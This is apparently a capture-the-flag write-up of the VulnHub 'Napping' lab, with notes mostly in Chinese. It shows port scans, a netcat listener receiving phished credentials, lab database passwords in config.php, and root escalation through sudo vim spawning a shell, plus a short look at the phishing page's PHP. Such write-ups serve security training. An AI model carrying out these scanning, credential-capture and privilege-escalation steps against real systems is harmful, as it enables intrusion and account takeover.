┌──(mikannse㉿kali)-[~/vulnhub] └─$ sudo nmap --min-rate=10000 -p- 192.168.56.132 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 21:06 CST Nmap scan report for 192.168.56.132 Host is up (0.0012s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:49:EE:4D (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 50.29 seconds
┌──(mikannse㉿kali)-[~/vulnhub] └─$ sudo nmap -sT -sC -sV -O -p22,80 192.168.56.132 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 21:08 CST Nmap scan report for 192.168.56.132 Host is up (0.0015s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 24:c4:fc:dc:4b:f4:31:a0:ad:0d:20:61:fd:ca:ab:79 (RSA) | 256 6f:31:b3:e7:7b:aa:22:a2:a7:80:ef:6d:d2:87:6c:be (ECDSA) |_ 256 af:01:85:cf:dd:43:e9:8d:32:50:83:b2:41:ec:1d:3b (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-title: Login |_http-server-header: Apache/2.4.41 (Ubuntu) MAC Address: 08:00:27:49:EE:4D (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.8 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 21.57 seconds
┌──(mikannse㉿kali)-[~/vulnhub/napping] └─$ nc -lvnp 8000 listening on [any] 8000 ... connect to [192.168.56.131] from (UNKNOWN) [192.168.56.132] 41724 POST / HTTP/1.1 Host: 192.168.56.131:8000 User-Agent: python-requests/2.22.0 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Content-Length: 45 Content-Type: application/x-www-form-urlencoded
username=daniel&password=C%40ughtm3napping123
url解码一下:daniel:C@ughtm3napping123
可用于ssh登录
横向移动
config.php
<?php /* Database credentials. Assuming you are running MySQL server with default setting (user 'root' with no password) */ define('DB_SERVER', 'localhost'); define('DB_USERNAME', 'adrian'); define('DB_PASSWORD', 'P@sswr0d456'); define('DB_NAME', 'website'); /* Attempt to connect to MySQL database */ $mysqli = newmysqli(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME); // Check connection if($mysqli === false){ die("ERROR: Could not connect. " . $mysqli->connect_error); } ?>
连接数据库发现无其他内容
adrian家目录有一个query.py
from datetime import datetime import requests
now = datetime.now()
r = requests.get('http://127.0.0.1/') if r.status_code == 200: f = open("site_status.txt","a") dt_string = now.strftime("%d/%m/%Y %H:%M:%S") f.write("Site is Up: ") f.write(dt_string) f.write("\n") f.close() else: f = open("site_status.txt","a") dt_string = now.strftime("%d/%m/%Y %H:%M:%S") f.write("Check Out Site: ") f.write(dt_string) f.write("\n") f.close()
并且还有一个site_status.txt
Site is Up: 14/09/2024 01:54:01 Site is Up: 14/09/2024 01:56:01 Site is Up: 15/09/2024 13:06:01 Site is Up: 15/09/2024 13:08:01 Site is Up: 15/09/2024 13:10:01 Site is Up: 15/09/2024 13:12:02 Site is Up: 15/09/2024 13:14:01 Site is Up: 15/09/2024 13:16:02 Site is Up: 15/09/2024 13:18:01 Site is Up: 15/09/2024 13:20:01
adrian@napping:/opt$ sudo -l sudo -l Matching Defaults entries for adrian on napping: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User adrian may run the following commands on napping: (root) NOPASSWD: /usr/bin/vim
用vim执行一个sh,提权成功
adrian@napping:~$ sudo vim -c ':!/bin/sh' sudo vim -c ':!/bin/sh'
BeyondROOT
这个机器是如何实现模拟钓鱼的呢
welcome.php会将submit的url存放在数据库中的links表中
<?php <SNIP> $mysqli = new mysqli("localhost", "adrian", "P@sswr0d456", "website"); // Check connection if($mysqli === false){ die("ERROR: Could not connect. " . $mysqli->connect_error); }
if(isset($_POST['submit'])){ //check if form was submitted $input = $mysqli->real_escape_string($_POST['url']); $sql = "INSERT INTO links (link) VALUES ('$input')"; if($mysqli->query($sql) === true){ $message = "Thank you for your submission, you have entered: <a href='$input' target='_blank' >Here</a>"; } else{ $message = "It is totally free!"; } }else{ $message = "It is totally free!"; <SNIP>